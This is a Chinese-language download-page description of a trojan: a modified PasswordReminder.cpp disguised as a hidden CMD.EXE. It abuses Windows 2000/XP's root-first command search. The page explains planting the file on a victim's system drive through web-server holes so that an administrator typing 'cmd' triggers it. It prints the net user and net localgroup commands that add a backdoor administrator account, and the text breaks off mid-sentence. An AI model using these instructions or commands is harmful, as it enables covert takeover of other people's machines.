你是不是經(jīng)常在開始菜單的運行窗口里運行命令呢? 看看這個漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在執(zhí)行搜索的時候, 首先查找根目錄 而開始菜單的運行窗口里執(zhí)行命令, 也是首先在系統(tǒng)盤的根目錄里進行查找. 這個漏洞其實是已經(jīng)是公開的秘密了. 既然現(xiàn)在作為漏洞公布出來, 我也就把網(wǎng)上的PasswordReminder.cpp拿來改了改 加了一個加超級管理員用戶和執(zhí)行cmd.exe的功能. 使用方法: 把程序解壓, 把壓縮包里的文件 CMD.EXE (該文件具有隱藏和只讀屬性) 釋放到目標機器的系統(tǒng)盤根目錄, 一般都是在C:比如利用UNICODE/decode漏洞就有寫根目錄的權限, 同時Asp/fp30reg.dll等遠程溢出出來的Shell, 一般都只有匿名權限, 但是它具有寫根目錄的權限 這個時候, 就可以把本程序放到目標機器的系統(tǒng)盤根目錄 只要等管理員在機器的開始菜單里運行命令: cmd 一切盡在掌握中.:) PS: 系統(tǒng)執(zhí)行后, 會先產(chǎn)生一個線程來做一些處理 然后用system()函數(shù)調(diào)用cmd.exe來讓用戶能夠執(zhí)行命令. 產(chǎn)生出來的線程會產(chǎn)生兩個進程序執(zhí)行如下兩個命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 這樣就在系統(tǒng)上增加了一個超級
標簽:
964057
zdnet
http
2100
上傳時間:
2015-01-12
上傳用戶:qlpqlq